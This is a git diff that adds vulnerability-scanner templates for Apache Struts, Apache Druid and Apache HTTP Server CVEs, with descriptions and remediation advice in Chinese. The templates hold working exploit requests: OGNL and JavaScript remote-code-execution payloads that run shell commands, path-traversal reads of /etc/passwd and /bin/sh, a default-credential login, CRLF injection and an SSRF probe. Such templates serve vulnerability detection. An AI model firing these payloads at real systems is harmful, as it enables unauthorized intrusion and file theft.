application/x-www-form-urlencoded + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_int(10000,20000)}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-057.yaml b/config/51pwn/yaml/Apache Struts/S2-057.yaml new file mode 100755 index 000000000..152f5a02c --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-057.yaml @@ -0,0 +1,44 @@ +id: S2-057 +info: + name: Apache Struts2 S2-057远程代码执行 + author: + - 折跃 + description: |- + Struts2 S2-057 远程命令执行 + 当Struts2的配置满足以下条件时: + alwaysSelectFullNamespace值为true + action元素未设置namespace属性,或使用了通配符 + namespace将由用户从uri传入,并作为OGNL表达式计算,最终造成任意命令执行漏洞。 + 影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案 + 在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==302 + - contains(all_headers,to_string(to_number(verify)*to_number(3))) + raw: + - | + GET /$%7B({{verify}}*3)%7D{{tmpPath}} HTTP/1.1 + Host: {{Hostname}} + attack: clusterbomb + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_int(10000,20000)}}' diff --git a/config/51pwn/yaml/Apache Struts/S2-062.yaml b/config/51pwn/yaml/Apache Struts/S2-062.yaml new file mode 100755 index 000000000..665ffc786 --- /dev/null +++ b/config/51pwn/yaml/Apache Struts/S2-062.yaml @@ -0,0 +1,62 @@ +id: S2-062 +info: + name: Apache Struts2 S2-062 - Remote Code Execution + author: + - 折跃 + description: |- + Struts2 S2-062 远程命令执行 + 此次 Apache Struts2 漏洞为 CVE-2020-17530 ( S2-061 )的修复不完整,导致输入验证不正确。 + 如果开发人员使用%{…} 语法进行强制 OGNL 解析,仍有一些特殊的 TAG 属性可以执行二次解析。对不受信任的用户输入使用强制 OGNL 解析可能会导致远程代码执行。 + severity: critical + remediation: |- + #### 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + + #### 临时修复方案 + 1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。 + 2、可通过设置所有标签中value=" "来缓解此漏洞。 + 将org.apache.commons.collection.BeanMap添加至excludedClasses黑名单中 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,verify) + raw: + - | + POST {{tmpPath}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Length: 1095 + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF + Content-Disposition: form-data; name="id" + + %{ + (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) + + (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) + + (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) + + (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) + + (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'echo {{verify}}'})) + } + + ------WebKitFormBoundaryl7d1B1aGsV2wcZwF— + attack: clusterbomb + payloads: + tmpPath: + - / + - /index.action + - /login.action + - /default.action + - /admin.action + - /user.action + redirects: true + req-condition: true + stop-at-first-match: true +variables: + verify: '{{rand_text_alphanumeric(32,"")}}' diff --git "a/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-25646.yaml" "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-25646.yaml" new file mode 100755 index 000000000..69ade4194 --- /dev/null +++ "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-25646.yaml" @@ -0,0 +1,75 @@ +id: CVE-2021-25646 +info: + name: Apache Druid RCE + author: + - l0ne1y + description: |- + Apache Druid filter 远程代码执行漏洞 + Apache Druid是美国阿帕奇软件(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。 + + Apache Druid 包括执行嵌入在各种类型请求中的用户提供的 JavaScript 代码的能力。此功能旨在用于高信任环境,默认情况下处于禁用状态。但是,在 Druid 0.20.0 和更早版本中,经过身份验证的用户可以发送特制的请求,强制 Druid 为该请求运行用户提供的 JavaScript 代码,而不管服务器配置如何。这可以用来在目标机器上以 Druid 服务器进程的权限执行代码。 + severity: high + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E +requests: +- matchers: + - type: status + status: + - 200 + - type: word + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - numRowsRead + - numRowsIndexed + - type: regex + part: body + regex: + - 'root:.*:0:0:' + matchers-condition: and + raw: + - | + POST /druid/indexer/v1/sampler HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + { + "type":"index", + "spec":{ + "ioConfig":{ + "type":"index", + "firehose":{ + "type":"local", + "baseDir":"/etc", + "filter":"passwd" + } + }, + "dataSchema":{ + "dataSource":"odgjxrrrePz", + "parser":{ + "parseSpec":{ + "format":"javascript", + "timestampSpec":{ + + }, + "dimensionsSpec":{ + + }, + "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}", + "":{ + "enabled":"true" + } + } + } + } + }, + "samplerConfig":{ + "numRows":10 + } + } diff --git "a/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-36749.yaml" "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-36749.yaml" new file mode 100755 index 000000000..a13a0de9d --- /dev/null +++ "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/CVE-2021-36749.yaml" @@ -0,0 +1,38 @@ +id: CVE-2021-36749 +info: + name: Apache Druid Authentication Restrictions Bypass + author: + - l0ne1y + description: |- + Apache Druid LoadData存在任意文件读取漏洞 + Apache Druid是美国阿帕奇(Apache)基金会的一款使用Java语言编写的、面向列的开源分布式数据库。 + 由于用户指定 HTTP InputSource 没有做出限制,可以通过将文件 URL 传递给 HTTP + InputSource 来绕过应用程序级别的限制。攻击者可利用该漏洞在未授权情况下,构造恶意请求执行文件读取,最终造成服务器敏感性信息泄露。 + severity: medium + remediation: |- + **官方修复方案:** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + [https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E](https://lists.apache.org/thread.html/rc9400a70d0ec5cdb8a3486fc5ddb0b5282961c0b63e764abfbcb9f5d%40%3Cdev.druid.apache.org%3E) + + **临时修复方案:** + 1、过滤".",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + condition: or + part: body + regex: + - 'root:.*:0:0:' + - 'druid:*:1000:1000:' + matchers-condition: and + raw: + - | + POST /druid/indexer/v1/sampler?for=connect HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}} diff --git "a/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-default-login.yaml" "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-default-login.yaml" new file mode 100755 index 000000000..41a7e34f2 --- /dev/null +++ "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-default-login.yaml" @@ -0,0 +1,41 @@ +id: druid-default-login +info: + name: Apache Druid Default Login + author: + - l0ne1y + description: |- + Apache Druid 默认口令登录漏洞 + Druid 是一个高性能实时分析数据库。它是为大型数据集上实时探索查询的引擎,提供专为 OLAP 设计的开源分析数据存储系统。其web后台默认账户是admin/admin + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: status + status: + - 200 + - type: regex + regex: + - ^success$ + matchers-condition: and + raw: + - | + POST /druid/submitLogin HTTP/1.1 + Host: {{Hostname}} + + loginUsername={{username}}&loginPassword={{password}} + - | + POST /submitLogin HTTP/1.1 + Host: {{Hostname}} + + loginUsername={{username}}&loginPassword={{password}} + attack: pitchfork + payloads: + password: + - admin + username: + - admin diff --git "a/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-monitor.yaml" "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-monitor.yaml" new file mode 100755 index 000000000..143d9a641 --- /dev/null +++ "b/config/51pwn/yaml/Apache druid \346\225\260\346\215\256\345\272\223/druid-monitor.yaml" @@ -0,0 +1,27 @@ +id: druid-monitor +info: + name: Druid Monitor Unauthorized Access + author: + - l0ne1y + description: |- + Druid Monitor 未授权访问漏洞 + Druid是阿里巴巴开源的一个数据源,主要用于java数据库连接池。在默认情况下,Druid页面无需授权即可直接访问,攻击者可以通过未授权访问漏洞获取到相关敏感信息。 + severity: high + remediation: | + 官方修复建议: + 建议升级到官方最新版本:/~https://github.com/alibaba/druid + + 临时修复建议: + 为Druid增加权限验证措施,建议参考 /~https://github.com/alibaba/druid/wiki/%E9%85%8D%E7%BD%AE_StatViewServlet%E9%85%8D%E7%BD%AE +requests: +- matchers: + - type: word + words: + - Druid Stat Index + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/druid/index.html' + method: GET diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2016-4975.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2016-4975.yaml" new file mode 100755 index 000000000..f87f7e510 --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2016-4975.yaml" @@ -0,0 +1,24 @@ +id: CVE-2016-4975 +info: + name: Apache mod_userdir CRLF injection + author: + - l0ne1y + description: |- + Apache mod_userdir CRLF注入漏洞 + 可能的 CRLF 注入允许对使用 mod_userdir 的站点进行 HTTP 响应拆分攻击。此问题已通过 2.4.25 和 2.2.32 中的更改得到缓解,这些更改禁止将 CR 或 LF 注入“位置”或其他出站标头键或值。已在 Apache HTTP Server 2.4.25 中修复(受影响的 2.4.1-2.4.23)。已在 Apache HTTP Server 2.2.32 中修复(受影响的 2.2.0-2.2.31)。 + severity: medium + remediation: |+ + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://httpd.apache.org/security/vulnerabilities_22.html#CVE-2016-4975 + https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2016-4975 + +requests: +- matchers: + - type: regex + part: header + regex: + - (?m)^(?:Set-Cookie\s*?:(?:\s*?|.*?;\s*?))(crlfinjection=crlfinjection)(?:\s*?)(?:$|;) + path: + - '{{BaseURL}}/~user/%0D%0ASet-Cookie:crlfinjection' + method: GET diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2017-15715.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2017-15715.yaml" new file mode 100755 index 000000000..68e1e876d --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2017-15715.yaml" @@ -0,0 +1,54 @@ +id: CVE-2017-15715 +info: + name: Apache Arbitrary File Upload + author: + - l0ne1y + description: |- + Apache 文件上传绕过漏洞 + 在 Apache httpd 2.4.0 到 2.4.29 中, 中指定的表达式可以将“$”匹配到恶意文件名中的换行符,而不是仅匹配文件名的结尾。这可以在某些文件的上传被外部阻止的环境中被利用,但只能通过匹配文件名的尾随部分。 + severity: high + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://httpd.apache.org/security/vulnerabilities_24.html + + **临时修复方案** + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + dsl: + - contains(body_2, "{{randstr_1}}") + raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ + + ------WebKitFormBoundaryKc8fBVDo558U4hbJ + Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" + + {{randstr_1}} + + ------WebKitFormBoundaryKc8fBVDo558U4hbJ + Content-Disposition: form-data; name="name" + + {{randstr}}.php\x0A + ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- + - | + GET /{{randstr}}.php\x0A HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: gzip,deflate + Accept: */* + req-condition: true diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2019-10092.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2019-10092.yaml" new file mode 100755 index 000000000..e96b77635 --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2019-10092.yaml" @@ -0,0 +1,24 @@ +id: CVE-2019-10092 +info: + name: Apache mod_proxy HTML Injection / Partial XSS + author: + - l0ne1y + description: |- + Apache mod_proxy 跨站脚本漏洞 + pache httpd中的mod_proxy错误页面存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。以下产品及版本受到影响:Apache httpd 2.4.39版本,2.4.38版本,2.4.37版本,2.4.35版本,2.4.34版本,2.4.33版本,2.4.30版本,2.4.29版本,2.4.28版本,2.4.27版本,2.4.26版本,2.4.25版本,2.4.23版本,2.4.20版本,2.4.18版本,2.4.17版本,2.4.16版本,2.4.12版本,2.4.10版本,2.4.9版本,2.4.7版本,2.4.6版本,2.4.4版本,2.4.3版本,2.4.2版本,2.4.1版本,2.4.0版本。 + severity: medium + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + http://httpd.apache.org/security/vulnerabilities_24.html + + **临时修复方案** + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + -
+ path: + - '{{BaseURL}}/%5cbing.com/evil.html' + method: GET diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2020-9490.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2020-9490.yaml" new file mode 100755 index 000000000..9c4df64dc --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2020-9490.yaml" @@ -0,0 +1,22 @@ +id: CVE-2020-9490 +info: + name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS + author: + - l0ne1y + description: |- + Apache HTTP Server 拒绝服务漏洞 + Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。 + severity: high + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490 +requests: +- matchers: + - type: regex + part: header + regex: + - Apache/2\.4\.([3-3][0-9]|2[0-9]|4[0-3]) + path: + - '{{BaseURL}}' + method: GET diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-40438.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-40438.yaml" new file mode 100755 index 000000000..0eceb08bd --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-40438.yaml" @@ -0,0 +1,31 @@ +id: CVE-2021-40438 +info: + name: Apache <= 2.4.48 Mod_Proxy SSRF + author: + - l0ne1y + description: |- + Apache HTTP Server mod_proxy 模块 SSRF漏洞 + Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 + Apache HTTP Server mod_proxy 模块存在SSRF漏洞,远程攻击者可通过发送精心构造的 uri-path 导致 mod_proxy 将请求转发到攻击者所选择的源服务器。 + severity: critical + remediation: |- + **官方修复建议** + 目前厂商已发布新版本以修复漏洞,具体参考官方链接: + https://httpd.apache.org/security/vulnerabilities_24.html + + **临时修复建议** + 1、过滤内网服务器对公网服务器请求的响应。如果Web应用是获取某一类型的文件,在把返回结果展示给用户之前应先验证返回的信息是否符合文件类型标准,比如返回信息应为图片,如果返回信息是HTML,则停止将返回信息返回客户端。 + 2、统一错误提示信息,避免用户可以根据错误信息来判断远端服务器的端口状态。 + 3、在内网服务器的防火墙上限制公网服务器的请求端口为HTTP等协议常用端口,如:80、443、8080、8090。 + 4、若公网服务器的内网IP与内网无业务通信,建议将公网服务器对应的内网IP列入黑名单,避免应用被用来获取内网数据。 + 5、内网服务器禁用不必要的协议,仅允许HTTP和HTTPS请求,防止类似于file:///、gopher://、ftp:// 等协议引起的安全问题。 +requests: +- matchers: + - type: word + words: + - Interactsh Server + path: + - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://interact.sh/' + method: GET + max-redirects: 2 + redirects: true diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-41773.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-41773.yaml" new file mode 100755 index 000000000..339402398 --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-41773.yaml" @@ -0,0 +1,45 @@ +id: CVE-2021-41773 +info: + name: Apache 2.4.49 - Path Traversal and Remote Code Execution + author: + - l0ne1y + description: |- + Apache HTTPd 2.4.49 路径穿越与命令执行漏洞 + Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。 + Apache HTTP Server 2.4.49版本存在路径遍历漏洞,攻击者可利用该漏洞使用路径遍历攻击将URL映射到预期文档根以外的文件。 + severity: critical + remediation: | + #### 官方修复方案: + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + [https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ](https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ) + #### 临时修复方案: + 1、系统开发阶段的防御 + 在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。 + 2、系统运行阶段的防御 + 系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。 + 不同web服务器禁止目录浏览方法有所不同。对IIS而言,如果不需要可执行的CGI,可以删除可执行虚拟目录或直接关闭目录浏览;如果确实需要可执行的虚拟目录,建议将可执行的虚拟目录单独放在一个分区。 + 对于Apache而言,管理员需要修改配置文件,禁止浏览列出目录和文件列表,如可通过修改conf目录下的httpd.conf文件来禁止使用目录索引。以Apache 2.2.25版本为例,打开httpd.conf文件将“Options Indexes FollowSymLinks”中的“Indexes”删除,这样web目录下的所有目录都不再生成索引。 + 为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。 + 3、安全设备的防御 + 进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。 +requests: +- matchers: + - type: regex + name: LFI + regex: + - 'root:.*:0:0:' + - type: word + name: RCE + words: + - CVE-2021-41773-POC + matchers-condition: or + raw: + - | + GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + - | + POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-42013.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-42013.yaml" new file mode 100755 index 000000000..f150fa51c --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/CVE-2021-42013.yaml" @@ -0,0 +1,40 @@ +id: CVE-2021-42013 +info: + name: Apache 2.4.49/2.4.50 - Path Traversal and Remote Code Execution + author: + - l0ne1y + description: |- + Apache HTTPd 2.4.49/2.4.50 路径穿越与命令执行漏洞 + Apache HTTP Server 存在路径遍历漏洞,该漏洞源于发现 Apache HTTP Server 2.4.50 版本中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。 + severity: critical + remediation: "**官方修复方案**\n目前厂商已发布升级补丁以修复漏洞,补丁获取链接:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-httpd-pathtrv-LAzg68cZ\n\n**临时修复方案**\n1、系统开发阶段的防御,在系统开发阶段应充分考虑系统的安全性,对目录遍历漏洞来说,需对用户提交的内容进行严格的过滤,这里主要指过滤目录跳转符,字符截断符,dir命令等。\n2、系统运行阶段的防御,系统运维人员需有强烈的安全意识,他们的一举一动都会影响用户的个人隐私信息安全。对系统运维人员来说,部署新的业务系统或者安装新的软件或应用后应通过web扫描工具积极查找系统是否存在目录遍历漏洞,尽可能不要在服务器上安装与业务不相关的第三方软件以避免引入目录遍历漏洞。除此之外,还应该合理配置web服务器(禁止目录浏览,分配好目录权限等)并积极关注所使用的各种软件和应用的版本发布情况,及时升级新的软件版本。'\n3、服务器配置,为更好的保护系统安全,实际生产环境和测试开发环境应该隔离。在生产环境中的任何改动,都需要严格遵循变更管理流程,做到执行人、执行时间、执行对象和具体改动均记录在案,并有企业信息安全部门进行事前审核和事后审计。技术人员一般不要直接调试生产系统,可以在测试环境中调试完成后再更新生产系统,以避免调试过程中开启某些接口、更改某些配置或者保存某些调试信息造成安全隐患。如果非要在线调试生产系统,而且需要保存调试信息时,应避免将调试信息直接保存到服务器本地,同时调试完成后应第一时间删除相关调试信息并恢复系统配置。\n + \ 1)IIS:打开 IIS 管理器,然后导航至您要管理的级别;在“功能视图”中,双击“目录浏览”;在“操作”窗格中,选择“目录浏览”功能,单击“禁用”。\n + \ 2)Nginx:找到Nginx配置文件中的“autoindex”,设置为“off”,然后重启Nginx。\n 3)Apache:修配置文件httpd.conf,把:Options + Indexes FollowSymLinks 改为:Options -Indexes FollowSymLinks ,然后重启Apache。\n 4)Tomcat:在应用的WEB-INF目录找到web.xml配置文件,将“listings”参数的初始化值设置为“false”,然后重启Tomcat。 + \ \n4、安全设备的防御,进行目录遍历攻击时,攻击者基本都会使用目录跳转符,同时可能配合使用字符截断符,dir命令等。对专业的安全设备来说通过检测特定语法下的目录跳转符,字符截断符,以及与查看目录相关的命令即可识别各种目录遍历攻击。部署专业的安全设备不仅可以很好的保护业务系统自身的目录遍历漏洞,同时还能防御web服务器和服务器上其他非业务相关的第三方应用漏洞引发的目录遍历攻击。\n" +requests: +- matchers: + - type: regex + name: LFI + regex: + - 'root:.*:0:0:' + - type: word + name: RCE + words: + - CVE-2021-42013 + matchers-condition: or + raw: + - |+ + GET /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - |+ + POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + + echo Content-Type: text/plain; echo; echo 31024-1202-EVC | rev + + unsafe: true diff --git "a/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/apache-filename-enum.yaml" "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/apache-filename-enum.yaml" new file mode 100755 index 000000000..cbf74e623 --- /dev/null +++ "b/config/51pwn/yaml/Apache\344\270\255\351\227\264\344\273\266(Apache HTTP Server)/apache-filename-enum.yaml" @@ -0,0 +1,33 @@ +id: apache-filename-enum +info: + name: Apache Filename Enumeration + author: + - l0ne1y + description: |- + Apache可用文件名类型查询 + apache服务器会根据你给的资源名称a,查找所有的a.*资源,加入有两种资源: a.txt 和a.php, 在类型表中查出: + .txt 对应文档类型为: text/plain + .php 对应文档类型为: application/x-httpd-php + + 如果请求时使用的 accept为: text/plain ,则返回a.txt + 如果请求时使用的 accept为: application/x-httpd-php ,则返回a.php + 如果请求时使用的accept为: text/none ,找不到这种类型,则协商失败,apache返回406,并返回所有可用的类型列表 + severity: low + remediation: 在配置文件httpd.conf中找到"ErrorDocument 406 